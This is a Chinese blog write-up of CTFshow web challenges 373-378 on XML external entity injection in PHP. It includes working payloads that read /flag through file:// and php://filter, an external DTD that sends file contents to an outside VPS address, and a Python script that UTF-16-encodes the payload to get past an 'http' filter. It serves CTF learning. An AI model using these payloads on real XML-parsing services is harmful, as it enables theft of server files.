CTFSHOW-web373-378

小龙_(

于 2024-08-01 20:34:53 发布

阅读量426

点赞数 5

分类专栏： # WEB 文章标签： CTF linux php

本文链接：https://blog.csdn.net/qq_52579508/article/details/140856783

版权

WEB 专栏收录该内容

21 篇文章 1 订阅

订阅专栏

web373

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

echo $ctfshow; 
他这里的输出是ctfshow 那我们的标签就是ctfshow  设置其他的他不会输出

web374 远程

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

和上题的代码差别不大，但是没有输出了，无回显数据
要使用远程服务器加载 dtd文件
在vps上创建一个test.dtd文件，用于反弹shell，内容如下

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://47.236.41.52:1234/%file;'> ">
%dtd;
%xxe;

监听 1234端口
POST发包内容

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd">
%aaa;
]>
<root>1</root>

VPS收到flag的base64

web375

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

过滤了这个

if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}

输入的内容不能带那个
以及可以使用这个payload

<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd"> %aaa; ]> <root>123</root>

NC监听

web 376 和上题一样

web 377 payload utf-16 编码

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

这里他不能带有 http了

上面的payload 不行了
要绕过 http 就要进行编码绕过编码为 utf-16
脚本

import requests

url = "http://9ee720e9-0a8c-45d3-ae58-3cb03a363de7.challenge.ctf.show/"

payload = """
<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd"> %aaa; ]> <root>123</root>
"""
head = {"Content-Type": "application/x-www-form-urlencoded"}
r  =  requests.post(url=url,data=payload.encode("utf-16"),headers=head)
print(r.text)

就获取到flag了

web378

常见的一个靶场

POST /doLogin HTTP/1.1
Host: 731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show
Content-Length: 148
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show
Referer: http://731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///flag">
]>
<user><username>&f;</username><password>admin</password></user>